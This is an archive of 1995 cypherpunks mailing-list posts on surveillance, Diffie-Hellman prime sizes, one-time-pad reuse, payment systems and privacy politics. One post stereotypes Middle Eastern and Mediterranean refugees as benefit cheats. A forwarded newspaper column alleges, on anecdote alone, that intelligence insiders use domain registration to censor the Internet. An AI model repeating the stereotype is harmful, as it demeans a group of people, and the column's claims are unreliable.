He's seen me like this before, so he didn't quite think I was from Mars... 5:45 As a lurker on the internet-marketing list, I got invited to a party at Bob Metcalfe's 5-story Back Bay townhouse. I had recruited Julie Rackliffe, a friend of mine in "Development" at the Computer Museum, to come along so I would know at least one person there. When I got there, I saw Dave Lash again. Small world. Besides the usual groceries, Bob had a big bunch of posterboard on a on his dining room table, and another piece of posterboard on his fireplace mantle. There were a bunch of questions on the table's poster, and one was about winners and loosers. I said that digital financial certificate underwriters would be the winners, and that loosers would be companies which depended on large information hierarchies. There was a question about anonymity, and I quoted Gilmore on network damage again. On the fireplace mantle was this posterboard with an org chart with business-card sized blank boxes all over it. One side of the pyramid said "Client", the other side said "Server", and so I drew a big cloud off to the side with the label "Crypto-Anarchist" in it, and put my card there. A few people moved their cards into the cloud. I was rather pleased with myself... I went upstairs where I met John Levine, who was in the PBS internet special last year, and Margy Levine Young, who wrote "The Internet for Windows for Dummies Starter Kit" in a room with a Windows box, a bonded ISDN connection and a wall projector. I showed a few people the e$ web-page, met the author of the refrigerator magnets page, and found out the John and Margy were fellow Unitarians, and that Margy's husband is the UU webmaster. We're everywhere, we're everywhere. I went up to the third floor, where by that time they were serving coffee and dessert, and Bob Metcalfe was there reccommending desserts to people. 
By that time I was talking to a trust officer at a very large institutional trustee bank here in Boston about how to underwrite digital cash. This guy was sympathetic because what he really wanted to do was chuck it all and go to work for Open Market. I told him that the next best thing was to let me come in and evangelize his bank a bit. He agreed. Dubiously. Anyway, He wants to come to lunch at BSDC, probably to schmooze the Open Market folks. So while I was standing there waiting for coffee, I told Metcalfe about getting a feature article into his magazine. One thing led to another, and the next thing I know, we're up another flight of stairs, and I'm dumping core again, this time about 10 steps from ARP-1, the original ARPANet transponder. Oh. Metcalfe uses a Mac, even though his internet feed is to a Wintel box. Metcalfe first starts off with a few coy questions about Phiber Optik, and Phil Zimmerman, and he figures out that my interest in cryptography is pretty much in its financial implications. So, for the better part of half an hour, he's quizzing me about stuff like digital cash, digital certificates and financial disintermediation, and pretty much the whole geodesic market rant. He says he likes "Mr., Doctor, Doctor, Huber's" stuff, a reference to Huber's hypercredentialed resume. He talked about these crazy people who were creating a secondary market in Digicash's beta certificates, so I told him about Lucky Green, Rich Lethin and how all of us created ecm. I told Metcalfe about reputation capital, and, when he talked about the evils of anonymity, I talk about how on the net, a key pair *is* your identity, and about Tim May's cryptoanarchy stuff. I told him about BSDC and asked about him speaking sometime, but he says he's working on a conference and a book, and his wife will kill him if he starts making speeches again. He wanted on the BSDC list, though, so I'm going to subscribe him and see what happens. I also said I'd mail him the e$ URL. 
10:45 I get home and after telling Carol all about my day, I still can't sleep, so I jump on the net and filter cypherpunks for buyinfo, and then answer some mail from my college roomate, who found me last week. He's a commander in the Navy who's now flying planes at McMurdo Sound in Antarctica. I shot him back a message and told him about the e$ web-page, which he's going to have to sneak into another office to look at some other night, ;-), and I told him that I was writing this and would send it to him when I was through. I still wasn't sleepy, so I plinked on the development version of the e$ page with the new picture, and when I was done with that, I read news, and, in reply to a comment I posted on soc.culture.alaska (I spent middle school in Anchorage), I get a reply from Mr. Pickett, my 7th and 8th grade science teacher, and my favorite science teacher on the whole planet. Since I had just put a picture on my web-page, I put the development page's URL on the message so he could see what I looked like now. 1:45 I finally go to sleep. Cheers, Bob Hettinga -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMJkyyfgyLN8bw6ZVAQFVAAP/Xmkp7H28Q/DfRCqMWiYboEo53T84hOIP n6pM/jjC1XAqf9E1v/i5PRQmCylyoJELEzsq3ET02bs4Wi25tS80dcm6oMHoHtAn 1SFCr6hHGIOxmLPJ+XnKCJgpKZEheLGqsG50ZEos26kQ3O4hD3bjZr5WcEyYFAGi 38i5yTwXR9A= =fKyZ -----END PGP SIGNATURE----- ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From fc at all.net Sun Nov 5 04:13:30 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Sun, 5 Nov 1995 20:13:30 +0800 Subject: lp (134.222.35.2)? In-Reply-To: <199511050653.WAA17662@xenon.chromatic.com> Message-ID: <9511051204.AA10691@all.net> ... 
> It would be fun (perhaps horrible) to see what the NSA does the first > time Israel or France set up their own high capacity long distance to > other friendly/unfriendly countries (thus bypassing the US completely). > Second, let France or some other country set up major Internet routing > clearinghouses which advertise secure routes to other nations (not US). I hope nobody would believe that either France or Israel would provide secure communications. France has a global reputation for industrial espionage, and Israel almost certainly listens to all the traffic it can. That's probably true of most industrialized nations in today's world. -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From asgaard at sos.sll.se Sun Nov 5 04:47:28 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Sun, 5 Nov 1995 20:47:28 +0800 Subject: Credentials Without Identity In-Reply-To: Message-ID: (PRIVATE mail, taken from the cp-list) I choose to make these 'off-topic' comments off the record: (By the way, please keep on 'crypto-moderating' the list your way; it makes much more sense - and is much more effective! - than Perry's.) > Fortunately, I have heard there is a "right wing" backlash growing in some > of the Scandinavian countries, especially Norway and Denmark. ("Right wing" > is what the press calls it...I hope it's really "anti-left wing," > anti-cradle-to-grave-socialism.) Well, also in Sweden, but this is merely against tax money transferred to the 'less fortunate' (or 'lazy', as you sometimes call them) and is very little, if at all, connected to anti-surveillance.
Cross-referencing various databases would actually be good for catching those who receive, for example, unemployment money while actually working full time (especially common amongst Mediterranean and Middle East 'political' refugees - many of whom like to come here and work for a handful of years, sometimes adding a decade to their actual age so they can go home to a warm climate at 55 to live as kings on their Swedish pensions). Isn't this a dilemma, also at your home turf? FINCEN efficiency might save some of your tax dollars. > To my surprise, several people on this list have expressed support for the > need for so-called "data privacy laws." I look at it this way: if I put I completely agree with you - actually, I think I took over some arguments from you on this subject long ago - that these laws are bullshit. > lists. Ironically, the Cypherpunks mailing list might be illegal in the > U.K. unless the legal forms were properly filled out, the fees paid, the > parties notified on a regular basis of information about them, etc. And our This applies very much so in Sweden too. It *is* illegal to maintain any database with 'information on persons' (like their email addresses) without approval from the Data Inspection. But it's an open secret that this law is broken on a massive front and no bureaucrat is really trying to uphold it. > "Disneyland with a death penalty" Yes, we live in interesting times. Mats From usura at utopia.hacktic.nl Sun Nov 5 05:40:33 1995 From: usura at utopia.hacktic.nl (Alex de Joode) Date: Sun, 5 Nov 1995 21:40:33 +0800 Subject: lp (134.222.35.2)? Message-ID: <199511051334.OAA22080@utopia.hacktic.nl> [..] : This is silly.
If the NSA were monitoring traffic with the consent of : EUnet and UUNET (and note that EUnet is owned by UUNET rival PSI), they : wouldn't need to play these routing games; they'd just eavesdrop at an : interconnect or on the leased lines leading into it, run a rough filter : over it to cut down volume, and tunnel the traffic home through other : channels (probably satellite). And if they were monitoring without the : consent of UUNET and EUnet, they still wouldn't play these games because : the providers would be upset about the unexpected load on the expensive : and overloaded transatlantic pipes. PSI has an 11% stake in EUnet, since they took over EUnet Britain, 11% doesn't qualify as 'owning' where I live. Regards, -AJ- From andreas at artcom.de Sun Nov 5 06:35:17 1995 From: andreas at artcom.de (Andreas Bogk) Date: Sun, 5 Nov 1995 22:35:17 +0800 Subject: New release of CFS Unix encrypting file system available In-Reply-To: <9510271856.AA24314@merckx.info.att.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >>>>> "Matt" == Matt Blaze writes: Matt> Source code for the latest version (release 1.3.1) of CFS, Matt> the Cryptographic File System, is now available upon request Matt> for research and experimental use in the US and Canada. Please report any leakage of this software immediately to this list. 
Andreas -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAgUBMJeY2EyjTSyISdw9AQFD7AP/SghCAohL5yJP6kgwz2W45zuexFkh1gQO s32CaBQqTEGLir7S5llYd53Eiof/y6JDCEDao9B45Tcz8IKtW2YhPbAOrRLS1dnp G8GTRL31R/LtqUaKcn/VqgV+sa6dwMWtelPnrYoFhtS5mxmBXP00nCca+PWfw8kt EadgTZtIYyc= =PgXu -----END PGP SIGNATURE----- From sinclai at ecf.toronto.edu Sun Nov 5 06:58:37 1995 From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N) Date: Sun, 5 Nov 1995 22:58:37 +0800 Subject: Video as a source of randomness In-Reply-To: <199511042352.PAA07530@ix4.ix.netcom.com> Message-ID: <95Nov5.095208edt.917@cannon.ecf.toronto.edu> The cheapest strong source of video noise that I can think of would be a small fan with a ribbon tied to the grille. As long as it's in a turbulent flow regime, you'll get very random numbers at a fast rate. From perry at piermont.com Sun Nov 5 08:14:44 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 6 Nov 1995 00:14:44 +0800 Subject: Photuris Primality verification needed In-Reply-To: <1973.bsimpson@morningstar.com> Message-ID: <199511051607.LAA08575@jekyll.piermont.com> "William Allen Simpson" writes: > Folks, I was somewhat disappointed in the response to our previous > requests for verification of the strength of the prime moduli. > > Recently, someone asked for a smaller prime of only 512-bits for speed. > This is more than enough for the strength of keys needed for DES, 3DES, > MD5 and SHA. Perhaps this would be easier to have more complete and > robust verification as well. I think that this is a very large mistake. Allow me to explain why. La Macchia (sp?) and Odlyzko (sp?) have a very nice result which shows that once you've done enough precalculation on a particular modulus, you can break any subsequent Diffie-Hellman operation performed on that modulus with (for our purposes) no effort. 
512 bits is, from what I can tell, not far out of the realm of possibility for what someone could try to crack with current machines given enough effort. [Sorry about the spelling. I'm tired, and don't have time to look up your names. I know that Brian at least reads this list and I'm sorry about likely misspelling your name.] Perry From perry at piermont.com Sun Nov 5 08:19:20 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 6 Nov 1995 00:19:20 +0800 Subject: using PGP only for digital signatures In-Reply-To: Message-ID: <199511051611.LAA08586@jekyll.piermont.com> James Black writes: > I am in a discussion (during the week) with a system administrator > about seeing if we can just make PGP publically available to everyone, > but now the discussion seems to be to just allow PGP to do digital > signatures, and I don't think that is the best choice, then. They are > not against PGP being used, but there are legal issues as to whether they > can offer it to everyone, as some students are international students, > and are not allowed to use the version for the US, or so I have been > informed, so now I need to see if we can have the international version, > so these students can use it. :( Actually, nothing in the ITAR says foreigners can't USE the U.S. version of PGP, just that you can't give them the software. However, I think it is a bad idea to make PGP available on a multiuser computer. It encourages a very, very bad habit -- that of using PGP on a multiuser computer.... > What they are trying to do is make certain that no > one can send a message to anyone, claim to be in the faculty, and cause > problems that way. But since you are using this software on a multiuser computer over likely insecure lines, or, even worse, over an insecure LAN, all you are going to do is make things even stickier when someone steals a key and starts pretending to be some faculty member anyway. Don't use public key software on untrusted hardware over insecure links. 
It's a BAD BAD BAD thing. Perry From perry at piermont.com Sun Nov 5 08:26:48 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 6 Nov 1995 00:26:48 +0800 Subject: consumer products that make nice sources In-Reply-To: Message-ID: <199511051620.LAA08607@jekyll.piermont.com> Lots of people are discussing all sorts of weird sources of radioactive material to use in a detector for an RNG. None of this is necessary. Scientific supply houses will happily sell you small calibrated sources for use in your lab, classroom, or in our case, machine room (:-). There is no need to find objects to dismantle or silly dangerous radioactive sources. You can get a source that produces exactly as much activity as you need very cheaply. Perry From dl at hplyot.obspm.fr Sun Nov 5 08:33:44 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Mon, 6 Nov 1995 00:33:44 +0800 Subject: S/KEY available for HP48 handheld calc Message-ID: <9511051627.AA15400@hplyot.obspm.fr> -----BEGIN PGP SIGNED MESSAGE----- Steve VanDevender () made available (GNU GPL) an S/KEY implementation for the nice HP hand held calc. It works very nicely with both MD4 and MD5 based systems (I personally tested with my MD4 based logdaemon-4.9, the author recommends OPIE's one) I've put his stuff on my anonymous ftp, you can fetch the stuff starting on ftp://ftp.box.eu.org/hp48/skey/ (ftp.box.eu.org=hplyot.obspm.fr=145.238.44.5) the executable I got from usenet has the following MD5 digest: 1b2613383708d4825f5842ed3e630d40 skey I hear you can get an hp48 for $30 in the US (I paid my hp48g US$230 when it came out in France two years ago), So no more excuse of clear passwd over the net ! [nor to sell 'smart cards' mega bucks!] ps: Who writes PGP for hp48 now ;-) ? [or maybe more seriously some skey hooks to it ?] dl - -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...
Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept
Panama South Africa DST domestic disruption counter-intelligence cracking Legion of Doom

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAgUBMJzlz3k52/beodHxAQEAGQP/XcX3mOw8YIVKe3kEuUkRb6wjB7JAvTi3
t/aQNAT/LQR4ZCx954HbqS231P3qxuz2Hc88xs7HAfbzk91C6VQ9J/r1+C7yBMiR
Jlk19lnWny8yHlkwm8KzF1TvqnZ6LvnGgLoiq5ExJIGJpRyJUf912LZf8N06tyFG
IJs8ZcN8/Kk=
=6RT6
-----END PGP SIGNATURE-----

From perry at piermont.com Sun Nov 5 08:46:11 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 1995 00:46:11 +0800
Subject: Credentials Without Identity
In-Reply-To:
Message-ID: <199511051639.LAA08639@jekyll.piermont.com>

Timothy C. May writes:
> (And as a measure of how apologetic some folks are getting about discussing
> anything not on Perry's List of Approved Topics,
[....]
> In fact, the issue of credentials
> and identity is NOT off-topic, not even semi-off-topic. It is central to
> the themes of our list. I urge all to read Chaum's seminal work on
> "credentials without identity.")

I've repeatedly stated, Tim, that my problem is with junk, not with stuff on list charter. You can claim anything you like about my statements, but it won't be true. Any statement to the effect that I'm against discussion of anonymous credentials is a "big lie" -- an attempt to distort what I have said by being sufficiently outrageous.

Repeating, I am troubled by people posting stuff about whether roadways should be privatized -- I am perfectly happy with discussion of Chaumian anonymous credentials. My problem is with people who think this is Libernet, or Waconet, or Fosternet, or IBM MicroKernel net, or Internet Investing Net, or what have you. I also find the beating of dead horses unfortunate, but I never complain about it since it's usually technically on topic.
Now, Tim, if you feel people should be able to post their questions about system administration of Unix boxes here, as in fact happened only last week, please speak up.

Perry

From rah at shipwright.com Sun Nov 5 08:46:26 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Mon, 6 Nov 1995 00:46:26 +0800
Subject: e$: 24 Hours
Message-ID:

>e$: 24 Hours

I have no idea how this got sent out twice. However it happened, I apologize.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA
(617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From perry at piermont.com Sun Nov 5 08:55:55 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 1995 00:55:55 +0800
Subject: Telephone switch capacity -Reply
In-Reply-To:
Message-ID: <199511051645.LAA08650@jekyll.piermont.com>

Lucky Green writes:
> One more time. Despite what you read in the papers, despite what most
> people - even in the legal profession - believe, telephone wiretaps do
> _not_ require a court order. They haven't required a court order in over a
> year.

They never required a conventional court order. This was not new. They always had a national security escape clause. However, at least they cannot be used in court unless there was a court order involved, and the process of getting "legitimate" authorization to, say, bug the embassy phones, does require that certain forms be followed.

The real problem, IMHO, is that people can avoid the formalities entirely and simply unlawfully wiretap, and that tracing such attempts is hard.

Perry

From bshantz at nwlink.com Sun Nov 5 09:08:48 1995
From: bshantz at nwlink.com (Brad Shantz)
Date: Mon, 6 Nov 1995 01:08:48 +0800
Subject: Tim, Perry, it's gettin' real old.
Message-ID: <9511051657.AA22854@toad.com>

Tim May, Perry Metzger, on the topic of off topic things, I think this little flame war of yours can be taken offline. It's getting real old watching two grown men fling mud at each other. That's why I don't watch Presidential debates anymore. (Although I did enjoy Admiral Stockdale turning off his hearing aid when Quayle and Gore were bitching at each other.)

This is the last I'll say on the subject. The wonders of freedom allow me to delete any threads I don't want to read. And I exercise that right frequently.

Grow up, boys.

Brad

From perry at piermont.com Sun Nov 5 09:21:03 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 1995 01:21:03 +0800
Subject: using pgp to make an otp
In-Reply-To:
Message-ID: <199511051710.MAA08683@jekyll.piermont.com>

Simon Spero writes:
> On the subject of reused one-time-pads: What are the attacks that become
> available if a pad is used two times. The ones I can think of are:

I will point out that the NSA's VENONA project, which among other things led indirectly to the execution of the Rosenbergs, got its only break from the two time use of one time pads by the Soviet spies. I can't guess all the techniques they used, but obviously there are enough things you can do to make it dangerous.

Perry

From perry at piermont.com Sun Nov 5 09:22:05 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 1995 01:22:05 +0800
Subject: lp (134.222.35.2)?
In-Reply-To: <199511050620.HAA14046@utopia.hacktic.nl>
Message-ID: <199511051713.MAA08691@jekyll.piermont.com>

Anonymous writes:
> > Notice that both messages went through an unnamed site -- 134.222.9.1 and
> > then a strangely-named site, "lp (134.222.35.2)"
[...]
> > Now let me see ... which spy agencies are located in or near Virginia?

The existence of MAE East in Virginia is far more significant. I'm sure the spooks are spying, but they are likely just tapping lines.
Machines that don't have proper reverse maps show up every day in large networks and aren't something to worry about. Your posting is based on the premise that this unnamed machine is of significance -- and it almost certainly isn't of any significance.

Quit looking for the spooks where they aren't. You should always assume your line is being tapped if you are saying something you don't want heard, anyway.

Perry

From habs at warwick.com Sun Nov 5 09:52:10 1995
From: habs at warwick.com (Harry S. Hawk)
Date: Mon, 6 Nov 1995 01:52:10 +0800
Subject: Public Reviews of CheckFree Wallet system?
Message-ID: <199511051743.MAA11416@cmyk.warwick.com>

Here is some more information on the Checkfree Wallet (tm) system. I've learned about it from some reporting I've been doing on it..

1) Has there been any public review of this product?

Here is the basic run down:

It uses a 768-bit key. They claim it is not escrowed with the US government.

It is exportable to most countries except for Sudan, Cuba, North Korea, Syria, Libya, Iraq or Iran.

It encrypts limited bits of information (like Credit Card Numbers), which is why they claim it was able to get export approval.

User configures the Wallet(tm) by downloading and installing and configuring it. It works with Proxy servers, which I have successfully tested.

It generates a public and private key pair using RSA technology.

It keeps the payer anonymous to the merchant via the internet. Merchants can learn the payer's name out of band (e.g., by phone).

No credit card info is stored on a merchant's site.

Payment is encrypted and signed by the payer and sent to the merchant, who adds their version of the transaction and their signature. It is forwarded to Checkfree, who then decrypt, compare the payers' and merchant's view of the transaction and if they agree process it.

Its use is very very quick and easy. It auto configures itself to Netscape.
Payment information is sent to the Wallet (TM) from the merchant in a MIME segment, which triggers a launch of the Wallet; the payer binds in their credit card data (already at Checkfree (at installation)), e.g., which card to use. Then the whole thing is sent to the merchant, then on to Checkfree for processing as indicated above.

I was very impressed with the software and its ease of use.

Currently only works on Windows but soon on the Mac..

/hawk

--
Harry Hawk
Manager of Interactive Communications
Warwick Baker & Fiore
212 941 4438
habs at warwick.com

From tcmay at got.net Sun Nov 5 10:01:20 1995
From: tcmay at got.net (Timothy C. May)
Date: Mon, 6 Nov 1995 02:01:20 +0800
Subject: "The Policeman Inside"
Message-ID:

At 12:35 PM 11/5/95, Mats Bergstrom wrote:

>Well, also in Sweden, but this is merely against tax money transfered to
>the 'less fortunate' (or 'lazy', as you sometimes call them) and is very
>little, if at all, connected to anti-surveillance. Cross-referencing
>various databases would actually be good for catching those who receive,
>for example, unemployment money while actually working full time (especially
>common amongst Mediterranean and Middle East 'political' refugees - many
>of whom like to come here and work for a handful of years, sometimes adding
>a decade to their actual age so they can go home to a warm climate at 55
>to live as kings on their Swedish pensions). Isn't this a dilemma, also at
>your home turf? FINCEN efficiency might save some of your tax dollars.
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Mats' point is an important issue to think about. The "conservative" who wants to get the bums off welfare and keep his hard-earned kroners or francs may embrace a FinCEN-type computerized police state.
In a system of extensive transfer payments, such "person number" tracking is needed to ensure that Citizen Units do not make double claims, do not retire before they have made their full productive contribution to the welfare of the herd, and so on.

A "libertarian" would argue that when economic interactions are uncoerced, when there are few if any lay-abouts collecting food stamps, welfare, AFDC, WICC, generous pensions paid by taxpayers, etc., then the "need" for Citizen Unit identification vanishes.

This actually has some crypto relevance, besides the obvious crypto anarchy connections. Namely, parallels with "offline" and "online" clearing. A system in which pieces of paper and various promissory notes are transferred around as money, with later (offline) clearing, tends to require True Names. This so that defaulting parties can be tracked down and collected from. (And of course there are also tax issues, and regulatory issues, but I'm concentrating on the offline or deferred clearing issues that tend to make True Names and physical identities more important.)

By contrast, a cash economy--online or immediate clearing--tends to not require identification. "Cash and carry," which has worked for millennia in diverse cultures which have no forms of identification. One pays in corn, or beads, or gold, and that's that.

(There are, as Futplex noted I like to say, "lots of issues." We could discuss exceptions to this, such as contracts, age credentials, etc. But, generally, cash transactions tend to produce no compelling need for identification. This is the norm in most retail transactions, unless "checks" or other forms of deferred clearing payment are tendered.)

The modern "identity state" is becoming consumed with the notion that everyone needs an index number. Not necessarily because the police want to compile dossiers on them (though this is a factor), but because of the focus on rules and regulations which affect _monetary flows based on identity_.

In the U.S.
for example, one used to just be able to pay someone to cut one's lawn in cash (or check, if he trusted you, blah blah) or babysit one's children. Now, under new crackdowns on social security laws, income tax estimated payment laws, hiring of undocumented workers laws, etc., this is technically no longer possible. One must, above some tiny threshold of payments, file various tax and social security forms, and take steps to ensure the worker is properly documented (*) (* Most white people in America have little "proof" that they are proper Citizen Units. This leads to uncomfortable situations where only brown- and yellow-skinned persons are asked to prove their identities and their Citizen Unit or Resident Unit status.) There is strong pressure on several fronts to establish a "National Identification Card." Others are opposed. My point, originally, to Rich Graves' mention of Chris Hibbert's excellent FAQ on Social Security Numbers and person numbers, is that it is no longer relevant to fight against a "single index number." Modern data base methods are so well-suited to cross-indexing that it hardly matters whether there's a single point of entry to the data base or not. THE KEY POINT IS THIS: Are voluntary economic transactions between persons to be subject to approval and regulation by the State? If babysitting and lawnmowing, not to mention hiring someone to write some C code, requires submitting tax and Social Security forms, requires checking the J-1 vs. Permanent Resident vs. Approved Citizen Unit status, then the die is cast. Ordinarily, or in earlier years, these rules might have been dismissed as trivial or as mostly ignorable. After all, so long as one is not planning to become Attorney General, who cares whether a housekeeper was "legal" or not? Who cares whether the detailed Social Security, IRS, and Immigration Control forms were filled out properly, or at all? 
Well, the State is becoming more efficient in tracking such things, and tax penalties are increasing. Further, bounties are being paid to those who inform on "tax cheats." Computerized records are being used to spot those with "apparent incomes" (= lifestyles) inconsistent with their tax filing status. Sure, part of this is to catch "double dippers," such as those collecting unemployment, welfare, AFDC, disability benefits while also doing work on the side. (There's a whole issue here of the laws about welfare recipients not being allowed to work, which I won't get into.) But the danger, and something that should inform our Cypherpunks discussions, is that these laws which are tied to one's status as a Person Unit in the system, inevitably require an extensive "identity tracking" regimen. The libertarian and anarcho-capitalist solution is not to increase the power of the surveillance state to detect fraud and non-compliance, but to roll things back to a more even keel. Even if one believes taxes are "the price paid for civilization," there are superior alternatives to the current system. (My current favorite is: mandatory slavery for X days per year, regardless of age or ability. Instead of taxes, everyone works one day in five, or 2 months out of the year, etc., for the herd. Building roads, picking up trash, administering computers, etc. There are "lots of issues," but even I agree this list is not the best place to discuss it; I mention it in passing.) In closing, we must beware "the policeman inside," to use the William Burroughs term. A surveillance state that arises because modern computers and data bases allow all economic transactions to be monitored, taxed, and approved or disapproved is a horror we should fight with all of our resources. Whether right-, left-, or libertarian-leaning, the implications of this state power to control our lives are horrible. --Tim May Views here are not the views of my Internet Service Provider or Government. 
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From anonymous-remailer at shell.portal.com Sun Nov 5 10:03:06 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Mon, 6 Nov 1995 02:03:06 +0800
Subject: censored? corrected
Message-ID: <199511020847.AAA10833@jobe.shell.portal.com>

NOTE: More than 8 hours have passed since I sent this text in plaintext directly to Cypherpunks without its being posted, so in this attempt I am sending it encrypted through ALUMNI remailer.
- Gary Jeffers gjeffers at socketis.net

INFO BLACKOUT

From THE SPOTLIGHT newspaper's TECHNOLOGY & LIBERTY column by Clark Matthews - Nov. 06, 1995 issue.

Powerful national security insiders have established effective control over the entrance gateways to Internet. Disturbing signs are now emerging that the "information superhighway" has been targeted for systematic surveillance and political dossier-building on Americans' opinions.

This ominous news came in the first of a series of articles by investigative journalist Steven Pizzo in WEB REVIEW, an online magazine of cyberculture and politics (http://gnn.com/wr/) published by Songline Studios of San Francisco. Pizzo is the author of INSIDE JOB, a groundbreaking expose' on the massive fraud and theft of insured deposits in 1980s savings and loan debacle.

According to Pizzo, control of Internet "domain name registration" has passed into private hands -- with the potential for serious mischief or worse. "Domain names" are the odd looking identifying names that are assigned to individual computer systems that compose the Internet (logoplex.com, for example).

Through a complex chain of licensing arrangements and corporate acquisitions detailed in Pizzo's article, this crucial control over Internet domain names has passed from the non-profit National Science Foundation to Network Solutions, Inc. (NSI) of Herndon, Virginia. Last May, amid growing public disbelief of Establishment media reports about the Oklahoma City bombing provocation, NSI was purchased by Scientific Applications International Corporation (SAIC) of San Diego.

SAIC is a $2 billion defense and FBI contractor with a board of directors that reads like a Who's Who of the intelligence community. Board members include Admiral Bobby Ray Inman, the former director of the National Security Agency (NSA) and deputy director of the CIA; Melvin Laird, defense secretary under Richard Nixon; Donald Hicks, former head of research & development for the Pentagon; Donald Kerr, former head of the Los Alamos National Laboratory; and Gen. Maxwell Thurman (ret.), the commander of the U.S. invasion of Panama.

Former members of SAIC's board include Robert Gates, the former CIA director under George Bush; current CIA director John Deutch; Anita Jones, Deutch's former Pentagon procurement officer, and William Perry, the present secretary of defense.

The corporation also has a legion of computer network specialists and an entire division of computer consultants. SAIC currently holds contracts for re-engineering the Pentagon's information systems, automating the FBI'S computerized fingerprint identification system, and building a national criminal history information system.

The Internet is a marvel of computer software technology. It was designed to survive a nuclear attack on the United States -- like the Post Office, it's literally smart enough to find a way to get the mail through, even if most of the network is missing.
But control of Internet domain name registration means the ability to remove troublesome -- or outspoken -- computer systems from the network. Potentially, this control also confers the power to insinuate "phantom" domains into the network -- for surveillance purposes, for example -- or for real-time, automatic censorship.

Furthermore, anecdotal evidence gathered by this author suggests that actual "truth control" is taking place on the 'net now. E-mail messages with controversial contents -- including the details of the SAIC takeover of domain names -- have consistently disappeared as they travel across the network. News items concerning the Vincent Foster "suicide" investigation and allegations of NSA bank spying through compromised Inslaw software are being quickly and automatically canceled. And the cancellations are not by their authors.

CRACKDOWN

With domain names under the control of secret government insiders, it is even theoretically possible that large parts of the Internet could be SHUT DOWN AND SILENCED at critical times. This could be accomplished by suddenly altering domain name registrations or interposing compromised "domains" at crucial points. These compromised systems could serve as "black holes" at critical times, stopping e-mail and important news from reaching the world -- or the rest of the country.

Exercises in "turning the Internet off" have already taken place in Taiwan and Hong Kong. In Taiwan, the 'net was successfully shut down. All network traffic -- including news, opinions and e-mail sent by computer users -- was successfully "bottled up" on the island and prevented from reaching the world. In Hong Kong, the Internet wasn't quite strangled, but the British authorities who control that colony managed to throttle free electronic speech with the rest of the world until everything was bottlenecked into a few little-known satellite links.
These are alarming precedents and sure signs that powerful, shadowy forces are preparing to chop at the very roots of America's new Liberty Tree. The secretive people on the board of directors of SAIC are intelligence professionals skilled at manufacturing events -- and then manufacturing public opinion and consent by controlling the truth.

Will Internet disinformation, censorship or "shutdowns" signal the next American crisis?

From edge at got.net Sun Nov 5 10:03:07 1995
From: edge at got.net (Jay Campbell)
Date: Mon, 6 Nov 1995 02:03:07 +0800
Subject: FBI seeks huge wiretapping system
Message-ID: <199511020955.BAA04564@you.got.net>

In today's San Jose Mercury, online edition. Forgive me if this has already been passed around.

-=-

FBI seeks huge wiretapping system

BY JOHN MARKOFF
New York Times

The FBI has proposed a national wiretapping system of unprecedented size and scope that would give law enforcement officials the capacity to monitor simultaneously as many as one out of every 100 phone lines in some high crime areas of the country.

Such a surveillance ability would vastly exceed the current needs of law enforcement officials around the country, who in recent years have conducted an annual average of less than 850 court-authorized wiretaps -- or fewer than one in every 174,000 phone lines.

The plan, which needs congressional approval for the money to finance it, would still require a court warrant to conduct wiretaps.

Still, the proposed expansion of the government's eavesdropping abilities raises questions among telephone industry executives as to why the FBI believes it may require such broad access to the nation's phone network in the future.

And privacy-rights advocates see the specter of a Big Brother surveillance capability whose very existence might encourage law enforcement officials to use wiretapping much more frequently as an investigative tool.
``A proposal that envisions some form of electronic surveillance for one of every 100 telephone lines would be frightening to many people,'' said James Dempsey, deputy director at the Center for National Security, a public policy organization in Washington. ``I think law enforcement needs to be honest with the public about what its intentions are.'' Generally, FBI officials contend that an advanced, high-capacity monitoring system will be necessary as more of modern life and business -- and crime -- takes place as voice or computer conversations over digital phone lines. On digital lines, communications are transmitted in electronic pulses represented by the 1's and 0's of computer code. Such communications are harder to monitor than with the old-fashioned analog lines in which conversations are transmitted as electronic signals corresponding to audible sound waves. An FBI spokesman declined to elaborate on the bureau's perceived need for such an expansion of its wiretapping abilities. ``The full implementation is absolutely essential for law enforcement and public safety,'' said Mike Kortan, an FBI spokesman in Washington. ``We are in ongoing discussions with the communications industry. Therefore it would be inappropriate to comment further at this point.'' The plan, which was published in the Federal Register on Oct. 16 but has not drawn much attention yet outside law enforcement and industry circles, is the first comprehensive outline by 